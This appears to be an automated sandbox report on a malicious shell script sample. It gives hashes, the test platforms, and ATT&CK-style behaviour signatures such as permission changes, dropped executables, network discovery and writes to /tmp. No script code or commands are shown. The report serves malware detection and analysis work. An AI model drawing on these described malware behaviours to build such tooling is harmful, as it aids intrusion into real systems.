Analysis
-
max time kernel
24s -
max time network
131s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240611-en -
resource tags
arch:amd64 arch:i386 image:ubuntu1804-amd64-20240611-en kernel:4.15.0-213-generic locale:en-us os:ubuntu-18.04-amd64 system -
submitted
21/10/2024, 01:43
Static task
static1
Behavioral task
behavioral1
Sample
c675540c6696ab6c43976dcc550c7d3071b1fa7682ca0cfe41a2e51e832ea158.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
c675540c6696ab6c43976dcc550c7d3071b1fa7682ca0cfe41a2e51e832ea158.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
c675540c6696ab6c43976dcc550c7d3071b1fa7682ca0cfe41a2e51e832ea158.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
c675540c6696ab6c43976dcc550c7d3071b1fa7682ca0cfe41a2e51e832ea158.sh
Resource
debian9-mipsel-20240226-en
General
-
Target
c675540c6696ab6c43976dcc550c7d3071b1fa7682ca0cfe41a2e51e832ea158.sh
-
Size
10KB
-
MD5
0118e79b0c3de04e3eb5808fe1ba68b9
-
SHA1
ac601bcfce442c42f94d103324fba14fcb2f4d81
-
SHA256
c675540c6696ab6c43976dcc550c7d3071b1fa7682ca0cfe41a2e51e832ea158
-
SHA512
0c23f06947c1ee4f77c2341fdcd5b3daa935c298df783254f52329c9adaf7eb1ac8e72de8b7aa1c960c44dafb766e7dee089998d3dce7c77b9d24679126baddd
-
SSDEEP
192:PoP4oHKWYubHfDdK6fo0M2NNYJSqRbH/1K6fo0UNNYJlo4oHKWM:PoOoxK6fo0M2NNYJSqPK6fo0UNNYJld
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Executes dropped EXE 28 IoCs
System Network Configuration Discovery 1 TTPs 10 IoCs
Adversaries may gather information about the network configuration of a system.
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
MD5
998368d7c95ea4293237f2320546e440
SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97